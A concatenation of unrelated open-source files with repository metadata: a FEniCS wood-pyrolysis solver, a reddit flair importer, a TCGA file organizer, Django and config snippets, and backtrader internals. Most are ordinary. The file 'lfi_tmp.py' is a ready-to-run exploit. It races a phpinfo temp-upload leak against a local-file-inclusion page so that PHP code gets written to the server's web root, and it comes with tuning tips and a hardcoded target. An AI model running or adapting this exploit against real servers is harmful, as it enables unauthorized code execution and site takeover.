delta_rho_W = + dudt(rho_W, rho_W1) * xi * dx \
              + r_W(rho_W_mid, T) * xi * dx

# active intermediate solid wood (tar) mass balance :
delta_rho_A = + dudt(rho_A, rho_A1) * chi * dx \
              + ( + r_Cg(rho_A_mid, T_mid) \
                  + r_r(rho_A_mid, T_mid) \
                  - r_W(rho_W_mid, T_mid) ) * chi * dx

# solid char mass balance :
delta_rho_C = + dudt(rho_C, rho_C1) * zeta * dx \
              - nu_C * r_Cg(rho_A_mid, T_mid) * zeta * dx

# advective temperature flux :
def L_T_adv(u):
    return c_g * dot(U3, grad(u))

# advective and diffusive temperature differential operator (strong form);
# only needed by the commented-out SUPG stabilization term below :
def L_T(u):
    Lu = + L_T_adv(u) \
         - ( k(rho_W_mid, rho_C_mid, rho_A_mid, u, V)[0] * u.dx(0) ).dx(0) \
         - ( k(rho_W_mid, rho_C_mid, rho_A_mid, u, V)[1] * u.dx(1) ).dx(1)
    return Lu

# enthalpy balance :
#tau_T = tau(T_mid, U3, k(rho_W_mid, rho_C_mid, rho_A_mid, T_mid, V))
T_factor = + rho_C_mid*c_C + rho_W_mid*c_W \
           + rho_A_mid*c_A + rho_g_mid*c_g
k_t = k(rho_W_mid, rho_C_mid, rho_A_mid, T_mid, V)
delta_T = + T_factor * dudt(T, T1) * beta * dx \
          + L_T_adv(T_mid) * beta * dx \
          + inner( k_t * grad(T_mid), grad(beta)) * dx \
          - q_r(rho_W_mid, rho_A_mid, T_mid) * beta * dx \
          - kdTdn(T_mid) * beta * ds \
#         + inner(L_T_adv(beta), tau_T*L_T(T_mid)) * dx \

#===============================================================================
# solution procedure :

# total residual :
delta = delta_U3 + delta_rho_g + delta_rho_W \
        + delta_rho_A + delta_rho_C + delta_T

# Jacobian :
J = derivative(delta, U, dU)

# Newton solver parameters :
params = {'newton_solver' :
          {
            'linear_solver' : 'mumps',
            #'linear_solver' : 'tfqmr',
            #'preconditioner' : 'jacobi',
            'absolute_tolerance' : 1e-14,
            'relative_tolerance' : 1e-9,
            'relaxation_parameter' : 1.0,
            'maximum_iterations' : 20,
            'error_on_nonconvergence' : True
          }
         }

ffc_options = {"optimize" : True}
#ffc_options = {}

problem = NonlinearVariationalProblem(delta, U, J=J, bcs=bcs,
                                      form_compiler_parameters=ffc_options)
solver = NonlinearVariationalSolver(problem)
solver.parameters.update(params)
def plot_solution(U,t):
    """
    Save PDF plots of each component of the mixed solution ``U`` at time
    ``t`` via the ``plot_variable`` helper (imported from ``helper``):
    velocity magnitude, relative overpressure p/p_0, the three solid
    densities, and temperature.
    """
    U3n, pn, rho_Wn, rho_An, rho_Cn, Tn = U.split(True)
    # project the BDM velocity onto a CG vector space for plotting :
    U3n = project(U3n, VCG)
    # NOTE(review): rho_gn is only needed by the commented-out File output
    rho_gn = project(rho_g(pn, Tn), DG)
    # efficiently calculate overpressure p / p_0 :
    # NOTE(review): vector().array() is the legacy dolfin API -- newer
    # versions use get_local(); confirm against the dolfin version in use.
    p_rat_v = pn.vector().array() / p_0
    p_rat = Function(DG, name="p_rat")
    p_rat.vector().set_local(p_rat_v)
    #U3n.rename('U3', '')
    #pn.rename('p', '')
    #rho_gn.rename('rho_g', '')
    #rho_Wn.rename('rho_W', '')
    #rho_An.rename('rho_A', '')
    #rho_Cn.rename('rho_C', '')
    #Tn.rename('T', '')
    #
    #File(out_dir + 'U3.pvd') << U3n
    #File(out_dir + 'p.pvd') << pn
    #File(out_dir + 'rho_g.pvd') << rho_gn
    #File(out_dir + 'rho_W.pvd') << rho_Wn
    #File(out_dir + 'rho_A.pvd') << rho_An
    #File(out_dir + 'rho_C.pvd') << rho_Cn
    #File(out_dir + 'T.pvd') << Tn
    # overpressure contour spacing :
    dp = 0.025
    plot_variable(u = U3n, name = 'U_%g' % t, direc = plt_dir,
                  ext = '.pdf',
                  title = r'$\Vert \mathbf{u} \Vert_{t=%g}$' % t,
                  levels = None,
                  numLvls = 6,
                  cmap = 'viridis',
                  tp = False,
                  show = False,
                  vec_scale = None,
                  vec_alpha = 0.8,
                  normalize_vec = False,
                  extend = 'neither',
                  cb_format = '%.1e')
    plot_variable(u = p_rat, name = 'p_rat_%g' % t, direc = plt_dir,
                  ext = '.pdf',
                  title = r'$\frac{p}{p_0}\Big|_{t=%g}$' % t,
                  levels = None,
                  numLvls = 9,
                  umin = 1,
                  umax = 1 + dp*8,
                  scale = 'lin',
                  cmap = 'viridis',
                  tp = True,
                  show = False,
                  extend = 'max',
                  cb_format = '%.3f')
    plot_variable(u = rho_Wn, name = 'rho_W%g' % t, direc = plt_dir,
                  ext = '.pdf',
                  title = r'$\rho_{\mathrm{W}}\Big|_{t=%g}$' % t,
                  levels = None,
                  numLvls = 9,
                  scale = 'lin',
                  cmap = 'viridis',
                  tp = True,
                  show = False,
                  extend = 'neither',
                  cb_format = '%.1f')
    plot_variable(u = rho_An, name = 'rho_A%g' % t, direc = plt_dir,
                  ext = '.pdf',
                  title = r'$\rho_{\mathrm{A}}\Big|_{t=%g}$' % t,
                  levels = None,
                  numLvls = 9,
                  scale = 'lin',
                  cmap = 'viridis',
                  tp = True,
                  show = False,
                  extend = 'neither',
                  cb_format = '%.1f')
    plot_variable(u = rho_Cn, name = 'rho_C%g' % t, direc = plt_dir,
                  ext = '.pdf',
                  title = r'$\rho_{\mathrm{C}}\Big|_{t=%g}$' % t,
                  levels = None,
                  numLvls = 9,
                  scale = 'lin',
                  cmap = 'viridis',
                  tp = True,
                  show = False,
                  extend = 'neither',
                  cb_format = '%.1f')
    plot_variable(u = Tn, name = 'T%g' % t, direc = plt_dir,
                  ext = '.pdf',
                  title = r'$T\Big|_{t=%g}$' % t,
                  levels = None,
                  numLvls = 9,
                  scale = 'lin',
                  cmap = 'viridis',
                  tp = True,
                  show = False,
                  extend = 'neither',
                  cb_format = '%.1f')
# start the timer :
start_time = time()
stars = "*****************************************************************"

# remember the nominal step / relaxation so the adaptive path can restore them :
initial_dt = dt
initial_alpha = params['newton_solver']['relaxation_parameter']
adaptive = False   # enable the relaxation-lowering retry loop below

plot_times = [31.0, 63.0, 93.0, 125.0]   # NOTE(review): tf = 31.0, so only
                                         # the first entry is reachable
times = arange(t0, tf+dt, dt)   # NOTE(review): 'arange' must come from the
                                # 'from fenics import *' star import -- confirm

# loop over all times :
for t in times:
    # set the previous solution to the last iteration :
    U1.assign(U)
    # evolve boundary condition;
    # NOTE(review): T_inf is a Constant here, so setting '.t' only has an
    # effect with the commented-out AmbientTemperature expression :
    T_inf.t = t
    # start the timer :
    tic = time()
    # compute solution :
    if not adaptive:
        solver.solve()
    ## solve mass equations, lowering time step on failure :
    #if adaptive:
    # par = params['newton_solver']
    # solved_h = False
    # while not solved_h:
    # if dt < DOLFIN_EPS:
    # status_h = [False,False]
    # break
    # U_temp = U.copy(True)
    # U1_temp = U1.copy(True)
    # status_h = solver.solve()
    # solved_h = status_h[1]
    # if not solved_h:
    # dt /= 2.0
    # print_text(stars, 'red', 1)
    # s = ">>> WARNING: time step lowered to %g <<<"
    # print_text(s % dt, 'red', 1)
    # U.assign(U_temp)
    # U1.assign(U1_temp)
    # print_text(stars, 'red', 1)
    # solve equation, lowering the Newton relaxation parameter on failure :
    if adaptive:
        solved_u = False
        par = params['newton_solver']
        while not solved_u:
            # give up once the relaxation parameter has been halved too far :
            if par['relaxation_parameter'] < 0.5:
                status_u = [False, False]
                break
            # keep copies so a failed solve can be rolled back :
            U_temp = U.copy(True)
            U1_temp = U1.copy(True)
            status_u = solver.solve()
            solved_u = status_u[1]
            if not solved_u:
                U.assign(U_temp)
                U1.assign(U1_temp)
                par['relaxation_parameter'] /= 1.4
                print_text(stars, 'red', 1)
                s = ">>> WARNING: newton relaxation parameter lowered to %g <<<"
                print_text(s % par['relaxation_parameter'], 'red', 1)
                print_text(stars, 'red', 1)
    # report the extrema of each solution component :
    U3n, pn, rho_Wn, rho_An, rho_Cn, Tn = U.split(True)
    print_min_max(U3n, 'U3')
    print_min_max(pn, 'p')
    print_min_max(rho_Wn, 'rho_W')
    print_min_max(rho_An, 'rho_A')
    print_min_max(rho_Cn, 'rho_C')
    print_min_max(Tn, 'T')
    # increment time step :
    s = '>>> Time: %g s, CPU time for last dt: %.3f s <<<'
    print_text(s % (t, time()-tic), 'red', 1)
    # save a plot;
    # NOTE(review): exact float comparison against arange output may skip
    # intended plot times -- confirm :
    if t in plot_times: plot_solution(U,t)
    # for the subsequent iteration, reset the parameters to normal :
    if adaptive:
        if par['relaxation_parameter'] != initial_alpha:
            print_text("::: resetting alpha to normal :::", 'green')
            par['relaxation_parameter'] = initial_alpha
        if dt != initial_dt:
            print_text("::: resetting dt to normal :::", 'green')
            dt = initial_dt
#===============================================================================
# post-processing :
# calculate total time to compute
sec = time() - start_time
mnn = sec / 60.0
hor = mnn / 60.0
sec = sec % 60
mnn = mnn % 60
text = "total time to perform transient run: %02d:%02d:%02d" % (hor,mnn,sec)
print_text(text, 'red', 1)
|
pf4d/wood_pyrolysis
|
diblasi/p_diblasi_1998.py
|
Python
|
gpl-3.0
| 20,019
|
#!/usr/bin/env python2
import sys, os
import json
import argparse
import sqlite3 as lite
con = None
def extant_file(x):
    """argparse ``type=`` validator: return *x* unchanged if it exists on disk.

    Raises ``argparse.ArgumentTypeError`` otherwise, which argparse turns
    into a clean usage error naming the offending option.
    """
    if not os.path.exists(x):
        # BUG FIX: argparse.ArgumentError requires an Action object as its
        # first argument and would itself blow up with a TypeError here;
        # ArgumentTypeError is the exception intended for type= callables.
        raise argparse.ArgumentTypeError("{0} does not exist".format(x))
    return x
def main():
    """Load a JSON list of flair records and bulk-insert them into flair.db.

    Python 2 code (print statements, old-style except clause).  Each JSON
    record must supply the keys 'user', 'flair_text' and 'flair_css_class'.
    """
    parser = argparse.ArgumentParser(description="Import flairs")
    parser.add_argument("-f", "--file", dest="filename", help="json input file", metavar="FILE", type=extant_file, required=True)
    args = parser.parse_args()
    try:
        con = lite.connect('flair.db')
    except lite.Error, e:
        print "Error %s:" % e.args[0]
        sys.exit(1)
    curs = con.cursor()
    # create the schema on first run; extra columns (lastpost, lastpostid,
    # lastid) are used by other tools in this repo, not by this importer
    curs.execute('''CREATE TABLE IF NOT EXISTS flair (
        username TEXT PRIMARY KEY NOT NULL ,
        flair_text TEXT,
        flair_css_class TEXT,
        lastpost timestamp,
        lastpostid TEXT,
        lastid TEXT DEFAULT ''
        )''')
    # NOTE(review): the file handle from open() is never closed explicitly
    flair_json = json.load(open(args.filename))
    # named-parameter bulk insert; one row per JSON record
    curs.executemany('INSERT INTO flair (username, flair_text, flair_css_class) VALUES (:user, :flair_text, :flair_css_class)', flair_json)
    con.commit()
    if con:
        con.close()

if __name__ == "__main__":
    main()
|
thelectronicnub/redditswapbot
|
util/flair_sql_import.py
|
Python
|
gpl-3.0
| 1,111
|
from __future__ import print_function
import argparse, os, requests, json, csv, shutil, gzip
def dict_to_file(d):
    """Dump the file_id -> case_id mapping *d* to ./dictionary.tsv.

    Writes a 'file_id\\tcase_id' header row followed by one row per entry.
    """
    with open('dictionary.tsv', 'w') as out_handle:
        tsv_writer = csv.writer(out_handle, delimiter='\t')
        tsv_writer.writerow(['file_id', 'case_id'])
        tsv_writer.writerows((key, d[key]) for key in d)
def filter_metadata(json_data, property):
    """Extract the case_id from a GDC /files/ids JSON response.

    BUG FIX: the original computed case_id and dropped it; it is now
    returned.  The ``property`` parameter (name kept for interface
    compatibility, though it shadows the builtin) is currently unused.
    """
    # all useful data resides in ['data']['hits'][0]
    case_id = json_data['data']['hits'][0]['cases'][0]['case_id']
    return case_id
def get_metadata(cwd, manifest_loc, data_folder_loc, meta_temp):
    """For each file UUID in the manifest, query the GDC API for its case_id.

    Side effects: creates *meta_temp*, dumps one '<file_id>_meta.json' per
    file there, and writes the file_id->case_id map to ./dictionary.tsv via
    dict_to_file().  Aborts the whole program if *meta_temp* already exists.
    Relies on the module-level ``verboseprint`` defined in the main script.
    """
    try:
        os.mkdir(meta_temp)
    except OSError:
        print('meta_temp folder already exists! aborting...')
        exit()
    verboseprint('folder \'meta_temp\' created in cwd')
    cases_endpt = 'https://gdc-api.nci.nih.gov/files/ids'
    # we want to store the association between file_id and case_id
    # we can use this dict to generate a tsv file for later
    d = dict()
    verboseprint('loading ' + manifest_loc + '...')
    # NOTE(review): 'rb' with csv.reader is Python 2 style; Python 3 needs
    # text mode -- confirm which interpreter this is run under
    with open(manifest_loc, 'rb') as tsvFile:
        print('fetching metadata for files in manifest...')
        # it'd be nice to know how long this is going to take, so figure out how many files we have to look up.
        # don't forget to return to the top of the file...
        for line_count, value in enumerate(tsvFile):
            pass
        tsvFile.seek(0)
        tsvData = csv.reader(tsvFile, delimiter='\t')
        # skip header row of manifest file
        next(tsvData, None)
        for row in tsvData:
            # get UUID of file from manifest, first column
            file_id = row[0]
            # notice comma at end, to print 'done' on same line
            # (line_count is decremented below, so this prints a countdown)
            verboseprint(str(line_count) + '\tfetching case_id for ' + str(file_id) + '...', end=' ')
            payload = {'query': file_id}
            # what is the variable type of response? probably string... whatever, we'll convert it to json
            response = requests.get(cases_endpt, params = payload)
            data = response.json()
            # let's dump the metadata to a file, just in case we need it later
            path_to_json = os.path.normpath(os.path.join(meta_temp, str(file_id) + '_meta.json'))
            with open(path_to_json, 'wb') as json_file:
                json.dump(data, json_file, separators=(',', ': '), indent=4)
            # hits contain a list of length 1, as do cases, so traversing the data requires list indices. I hope all data is formatted in this way...
            case_id = data['data']['hits'][0]['cases'][0]['case_id']
            d[file_id] = case_id
            verboseprint('done')
            line_count -= 1
    verboseprint('file_id to case_id association written to ' + str(cwd) + '/dictionary.tsv\n')
    verboseprint('aquisition complete.')
    dict_to_file(d)
def remove_junk(file_id, all_files):
    """Return the single real data file from a downloaded file_id folder.

    Strips the 'logs' folder entry and any dot files from *all_files*
    (mutated in place), then returns the first remaining name.  Exits the
    program if nothing is left.
    """
    try:
        all_files.remove('logs')
    except ValueError:
        print('\nno logs folder found for file_id: ' + str(file_id))
        print('was ' + str(file_id) + ' downloaded separately? moving on...')
    # BUG FIX: iterate over a copy -- removing from the list being iterated
    # skipped every second dot file in the original code
    for f in list(all_files):
        if f.startswith('.'):
            all_files.remove(f)
    # BUG FIX: the original caught IndexError around the loop, but the
    # indexing that can actually fail happened outside the try; check
    # emptiness explicitly instead
    if not all_files:
        print('\nno files found for file_id: ' + str(file_id))
        print('check for files before continuing! exiting...')
        exit()
    # we should be left with 2 files: the actual file and its corresponding
    # _meta.json file (the meta file lives in meta_temp, not here)
    return all_files[0]
def filter_data(cwd, data_folder_loc):
    """Rewrite dictionary.tsv, adding a 'filename' column and dropping
    annotated entries.

    Reads ./dictionary.tsv (file_id, case_id), resolves each file_id folder
    under *data_folder_loc*, and writes file_id/case_id/filename rows to a
    temp file which then replaces dictionary.tsv.  Uses the module-level
    ``verboseprint``.
    """
    verboseprint('filtering data of logs, annotations, and dot files...')
    # we have more files in our download than we need. our goal is to extract only the files we need and leave the other ones alone
    # we can accomplish this by creating a dictionary of pointers to the actual files and manipulating that
    # then we do all the I/O at the end
    # traverse data folder, store contents in dictionary
    with open('dictionary.tsv', 'rb') as csvInput, open('dictionary_edit.tsv', 'wb') as csvOutput:
        reader = csv.reader(csvInput, delimiter='\t')
        writer = csv.writer(csvOutput, delimiter='\t')
        next(reader, None) # skip header row of input file
        writer.writerow(['file_id', 'case_id', 'filename']) # add header to output file.
        for row in reader:
            path_to_file_id = os.path.normpath(os.path.join(data_folder_loc, row[0]))
            if os.path.isdir(path_to_file_id): # check if
                # if we can avoid it, we don't want to have to deal with inferior data
                # let's assume for now that annotated data is inferior
                if os.listdir(path_to_file_id).count('annotations.txt') > 0:
                    # NOTE(review): this does NOT skip the current entry --
                    # the current row is simply not written, but next() here
                    # additionally consumes the FOLLOWING row, which is then
                    # never processed at all.  Confirm intent before relying
                    # on this.
                    next(reader, None) # skip this entry
                else:
                    file_list = remove_junk(row[0], os.listdir(path_to_file_id))
                    writer.writerow([
                        row[0],
                        row[1],
                        file_list
                    ])
    # content[row[0]] = os.listdir(path_to_file_id) # file_id \t all files
    # this overwrites the original file
    os.rename('dictionary_edit.tsv', 'dictionary.tsv')
    verboseprint('filtering complete')
def extract_data(cwd, data_folder_loc, extracted_folder_loc):
    """Copy each data file into extracted/<case_id>/ per dictionary.tsv.

    dictionary.tsv columns (written by filter_data): file_id, case_id,
    filename.  Several file_ids may share one case_id folder.
    """
    verboseprint('creating new folder hierarchy \'extracted\' in working directory...')
    # create new folder structure and copy files
    os.mkdir(extracted_folder_loc)
    with open('dictionary.tsv', 'rb') as inFile:
        tsvData = csv.reader(inFile, delimiter='\t')
        # skip header
        next(tsvData, None)
        for row in tsvData:
            path_to_case_id = os.path.normpath(os.path.join(extracted_folder_loc, row[1]))
            # create the per-case folder only on first sight
            if os.path.isdir(path_to_case_id):
                pass
            else:
                os.mkdir(path_to_case_id)
            # copy files to associated case_id folders
            shutil.copyfile(
                os.path.normpath(os.path.join(data_folder_loc, row[0], row[2])), # old file location
                os.path.normpath(os.path.join(extracted_folder_loc, row[1], row[2])) # new file location
            )
    verboseprint('folder hierarchy complete')
def gunzip(cwd, extracted_folder_loc):
    """Decompress every .gz file listed in dictionary.tsv, in place.

    The decompressed copy drops the '.gz' suffix; the compressed original
    is deleted afterwards.  Non-.gz entries are left untouched.
    """
    print('extracting gzipped files...')
    with open('dictionary.tsv', 'rb') as tsvFile:
        tsv_data = csv.reader(tsvFile, delimiter='\t')
        next(tsv_data, None) # skip header
        for row in tsv_data:
            gzpd_file_loc = os.path.normpath(os.path.join(extracted_folder_loc, row[1], row[2]))
            # target name: same path minus the trailing '.gz'
            unzpd_file_loc = os.path.normpath(os.path.join(extracted_folder_loc, row[1], row[2][:-3]))
            if gzpd_file_loc[-3:] != '.gz':
                pass
            else:
                verboseprint('gunzipping ' + gzpd_file_loc)
                # NOTE(review): the gzip handle is never closed explicitly
                zpd_data = gzip.open(gzpd_file_loc, 'rb')
                unzpd = zpd_data.read()
                with open(unzpd_file_loc, 'wb') as unzpd_file:
                    unzpd_file.write(unzpd)
                os.remove(gzpd_file_loc)
    verboseprint('extraction complete')
def mv_meta_files(cwd, meta_temp, extracted_folder_loc):
    # WORK IN PROGRESS
    """Move each '<file_id>_meta.json' from meta_temp next to its case folder.

    Still incomplete: the function currently only computes the meta file
    path and lists the meta_temp folder; no move is performed yet.  (The
    call site at the bottom of the script is commented out accordingly.)
    """
    with open('dictionary.tsv', 'rb') as tsvFile:
        tsv_data = csv.reader(tsvFile, delimiter='\t')
        next(tsv_data, None) # skip header
        for row in tsv_data:
            # BUG FIX: os.normpath/os.join do not exist (AttributeError);
            # the helpers live in os.path.  Also the meta file written by
            # get_metadata() is named '<file_id>_meta.json' (concatenated),
            # not a '_meta.json' inside a '<file_id>' subfolder.
            meta_file = os.path.normpath(os.path.join(meta_temp, row[0] + '_meta.json'))
            case_folder = None
            for folder in os.listdir(meta_temp):
                print(folder[:-10])
cwd = os.getcwd()

# command line interface :
parser = argparse.ArgumentParser(description='reorganize the files downloaded from the TCGA Database into cases, in order to facilitate statistical analysis')
parser.add_argument('manifest_loc', help='the full path to your manifest.tsv file')
parser.add_argument('data_folder_loc', help='the full path to your data folder, which you downloaded from the TCGA with the manifest')
parser.add_argument('-v', action='store_true', help='verbose output')
args = parser.parse_args()

# verboseprint is a no-op unless -v was given; the worker functions above
# use it as a module-level global
verboseprint = print if args.v else lambda *a, **k: None

print('')

# validate both inputs before doing any work :
if os.path.isfile(args.manifest_loc):
    verboseprint('manifest accepted.')
else:
    print('manifest file location is invalid. exiting\n')
    exit()

# note! isdir() does not work with escaped characters
if os.path.isdir(args.data_folder_loc):
    verboseprint('data folder accepted.\n')
# # if we want to traverse the folder hierarchy, we need to switch the cwd
# os.chdir(data_folder_loc)
else:
    print('data folder location is invalid. exiting')
    exit()

# define location of temporary folder for storing the meta.json files
meta_temp = os.path.normpath(os.path.join(cwd, 'meta_temp'))

# define folder location of final extracted data
extracted_folder_loc = os.path.normpath(os.path.join(cwd, 'extracted'))

# pipeline: fetch case ids, prune the mapping, copy into per-case folders,
# then decompress
get_metadata(cwd, args.manifest_loc, args.data_folder_loc, meta_temp)
filter_data(cwd, args.data_folder_loc)
extract_data(cwd, args.data_folder_loc, extracted_folder_loc)
gunzip(cwd, extracted_folder_loc)
# mv_meta_files(cwd, meta_temp, extracted_folder_loc)
print('\nprocessing complete. exiting')
|
poddus/tcga_fetch_n_clean
|
fetch_n_clean_0.0.1.py
|
Python
|
gpl-3.0
| 8,154
|
from django.conf.urls import patterns, include, url
from django.contrib import admin
# register every installed app's admin.py models with the admin site
admin.autodiscover()

# root URL configuration: everything is delegated to psybrowse_app, except
# /admin/ which goes to the Django admin.  NOTE(review): patterns('') is the
# pre-Django-1.10 style -- confirm the pinned Django version before upgrading.
urlpatterns = patterns('',
    # Examples:
    # url(r'^$', 'psybrowse.views.home', name='home'),
    # url(r'^blog/', include('blog.urls')),

    url(r'^', include('psybrowse_app.urls')),
    url(r'^admin/', include(admin.site.urls)),
)
|
jeff-hughes/PsyBrowse
|
psybrowse/urls.py
|
Python
|
gpl-3.0
| 346
|
"""
Platform dependent OS calls - Windows edition
FIXME Not tested, yet
"""
import logging
import win32gui
import ctypes
from PyQt5.QtCore import QDir, QStandardPaths, QByteArray, QBuffer, QIODevice
from extract_icon import ExtractIcon
LOGGER = logging.getLogger(__name__)
# Change windows 7 group ID
myappid = 'net.bitarbeiter.gameplay' # arbitrary string
ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid)
def get_foreground_window():
    """ Returns the name (or pointer, or whatever is
    required as set_foreground_window argument)
    of the currently active window
    """
    # win32gui hands back an integer HWND handle
    return win32gui.GetForegroundWindow()
def set_foreground_window(handle):
    """ Changes the currently active window

    *handle* is the HWND previously obtained from get_foreground_window().
    """
    win32gui.SetForegroundWindow(handle)
def find_icon_by_name(iconName):
    """ Returns the content and content type of an Icon by name or path.

    Resolves *iconName* to an executable on PATH and extracts its best
    group icon as PNG bytes.  Returns (bytes, 'image/png') on success,
    (None, None) if no executable or no icon could be extracted.
    """
    # Check if iconName is an executable
    path = QStandardPaths.findExecutable(iconName)
    if path:
        path = QDir.toNativeSeparators(path)
        try:
            extractor = ExtractIcon(path)
            groups = extractor.get_group_icons()
            if len(groups) > 0:
                best = extractor.best_icon(groups[0])
                exported = extractor.export(groups[0], best)
                # serialize the QImage to PNG via an in-memory buffer
                ba = QByteArray()
                buf = QBuffer(ba)
                buf.open(QIODevice.WriteOnly)
                exported.save(buf, "png")
                return (ba.data(), 'image/png')
        except Exception:
            # BUG FIX: was a bare 'except:', which would also swallow
            # SystemExit/KeyboardInterrupt; extraction failure is logged
            # and treated as "no icon"
            LOGGER.exception("Failed to load icon from %s" % path)
    return (None, None)
# vim: set fenc=utf-8 ts=4 sw=4 noet :
|
Cybso/gameplay
|
gameplay/platform/windows.py
|
Python
|
gpl-3.0
| 1,468
|
#!/usr/bin/env python
# encoding=utf-8
# Author : idwar
# http://secer.org
'''
可能需要你改的几个地方:
1、host
2、port
3、request中的phpinfo页面名字及路径
4、hello_lfi() 函数中的url,即存在lfi的页面和参数
5、如果不成功或报错,尝试增加padding长度到7000、8000试试
6、某些开了magic_quotes_gpc或者其他东西不能%00的,自行想办法截断并在(4)的位置对应修改
Good Luck :)
7、payload的./指的是当前脚本的目录下,所以要注意最后输出的结果
'''
import re
import urllib2
import hashlib
from socket import *
from time import sleep
host = '192.168.227.133'
#host = gethostbyname(domain)
port = 80
shell_name = hashlib.md5(host).hexdigest() + '.php'
pattern = re.compile(r'''\[tmp_name\]\s=>\s(.*)\W*error]''')
payload = '''idwar<?php fputs(fopen('./''' + shell_name + '''\',"w"),"<?php phpinfo();?>")?>\r'''
req = '''-----------------------------7dbff1ded0714\r
Content-Disposition: form-data; name="dummyname"; filename="test.txt"\r
Content-Type: text/plain\r
\r
%s
-----------------------------7dbff1ded0714--\r''' % payload
padding='A' * 8000
phpinfo_req ='''POST /phpinfo.php?a='''+padding+''' HTTP/1.0\r
Cookie: PHPSESSID=q249llvfromc1or39t6tvnun42; othercookie='''+padding+'''\r
HTTP_ACCEPT: ''' + padding + '''\r
HTTP_USER_AGENT: ''' + padding + '''\r
HTTP_ACCEPT_LANGUAGE: ''' + padding + '''\r
HTTP_PRAGMA: ''' + padding + '''\r
Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\r
Content-Length: %s\r
Host: %s\r
\r
%s''' % (len(req), host, req)
def hello_lfi():
while 1:
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
s.send(phpinfo_req)
data = ''
while r'</body></html>' not in data:
data = s.recv(9999)
search_ = re.search(pattern, data)
if search_:
tmp_file_name = search_.group(1)
url = r'http://192.168.227.133/lfi/ex1.php?f=%s' % tmp_file_name
print url
search_request = urllib2.Request(url)
search_response = urllib2.urlopen(search_request)
html_data = search_response.read()
if 'idwar' in html_data:
s.close()
return '\nDone. Your webshell is : \n\n%s\n' % ('http://' + host + '/' + shell_name)
#import sys;sys.exit()
s.close()
if __name__ == '__main__':
print hello_lfi()
print '\n Good Luck :)'
|
hackersql/sq1map
|
Web/信息收集/pentest_tools/漏洞利用/web漏洞/lfi/lfi_tmp.py
|
Python
|
gpl-3.0
| 2,542
|
import json
from collections import OrderedDict
import os
class Config:
    """Process-wide singleton giving read access to config.json.

    The JSON file is loaded from this module's directory with key order
    preserved (OrderedDict).
    """
    # NOTE(review): this path is never used -- load_configs() builds its own
    # path relative to this module.  Confirm before relying on it.
    config_file_path = './config.json'
    _instance = None

    def __init__(self):
        # runs on *every* Config() call (even though __new__ returns the
        # shared instance), so the file is re-read each time
        self.config = self.load_configs()

    def load_configs(self):
        """Parse config.json from this module's directory, preserving key order."""
        dir_path = os.path.dirname(os.path.realpath(__file__))
        with open(dir_path+'/config.json') as conf_file:
            config = json.load(conf_file, object_pairs_hook = OrderedDict)
        return config

    def get_transports(self):
        """Return the configured transports list."""
        return self.config['transports']

    def get_redis_conf(self):
        """Return the (host, port) tuple for redis."""
        return self.config['redis_host'], self.config['redis_port']

    def get_static_path(self):
        """Return the configured static files path."""
        return self.config['static_path']

    # singleton
    def __new__(cls, *args, **kwargs):
        if not cls._instance:
            # BUG FIX: object.__new__ must not be forwarded extra arguments
            # when __new__ is overridden -- the original
            # super().__new__(cls, *args, **kwargs) raises TypeError on
            # Python 3 as soon as any argument is passed.
            cls._instance = super().__new__(cls)
        return cls._instance
|
MShel/PyChatBot
|
config/Config.py
|
Python
|
gpl-3.0
| 891
|
#!/usr/bin/env python
# -*- coding: utf-8; py-indent-offset:4 -*-
###############################################################################
#
# Copyright (C) 2015-2020 Daniel Rodriguez
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from collections import OrderedDict
import itertools
import sys
import backtrader as bt
from .utils.py3 import zip, string_types, with_metaclass
def findbases(kls, topclass):
    """Collect the ancestors of *kls* that subclass *topclass*.

    Returns a list ordered most-basal first; *kls* itself and *topclass*'s
    own bases are not included unless they appear in the chain.
    """
    found = []
    for parent in kls.__bases__:
        if issubclass(parent, topclass):
            found += findbases(parent, topclass)
            found.append(parent)
    return found
def findowner(owned, cls, startlevel=2, skip=None):
    '''
    Walk up the call stack looking for an instance of *cls* that owns
    *owned*: each frame's local 'self' (regular methods) and '_obj'
    (the MetaBase creation hooks) are candidates.  *owned* itself and
    *skip* are rejected.  Returns the first match or None if the stack
    is exhausted.
    '''
    # skip this frame and the caller's -> start at 2
    for framelevel in itertools.count(startlevel):
        try:
            frame = sys._getframe(framelevel)
        except ValueError:
            # Frame depth exceeded ... no owner ... break away
            break

        # 'self' in regular code
        self_ = frame.f_locals.get('self', None)
        if skip is not self_:
            if self_ is not owned and isinstance(self_, cls):
                return self_

        # '_obj' in metaclasses
        obj_ = frame.f_locals.get('_obj', None)
        if skip is not obj_:
            if obj_ is not owned and isinstance(obj_, cls):
                return obj_

    return None
class MetaBase(type):
    '''
    Metaclass that splits instance creation into five overridable stages,
    invoked in order by __call__:
    doprenew -> donew -> dopreinit -> doinit -> dopostinit.
    Each stage may replace the class/instance and rewrite args/kwargs,
    which lets subclass metaclasses (e.g. MetaParams) hook object creation
    without overriding __call__ itself.
    '''
    def doprenew(cls, *args, **kwargs):
        # before __new__; may substitute the class being instantiated
        return cls, args, kwargs

    def donew(cls, *args, **kwargs):
        # actual instance allocation
        _obj = cls.__new__(cls, *args, **kwargs)
        return _obj, args, kwargs

    def dopreinit(cls, _obj, *args, **kwargs):
        # before __init__
        return _obj, args, kwargs

    def doinit(cls, _obj, *args, **kwargs):
        # runs __init__ with the (possibly rewritten) arguments
        _obj.__init__(*args, **kwargs)
        return _obj, args, kwargs

    def dopostinit(cls, _obj, *args, **kwargs):
        # after __init__; last chance to adjust the finished instance
        return _obj, args, kwargs

    def __call__(cls, *args, **kwargs):
        cls, args, kwargs = cls.doprenew(*args, **kwargs)
        _obj, args, kwargs = cls.donew(*args, **kwargs)
        _obj, args, kwargs = cls.dopreinit(_obj, *args, **kwargs)
        _obj, args, kwargs = cls.doinit(_obj, *args, **kwargs)
        _obj, args, kwargs = cls.dopostinit(_obj, *args, **kwargs)
        return _obj
class AutoInfoClass(object):
    '''
    Holds a set of name/value pairs at the class level and supports
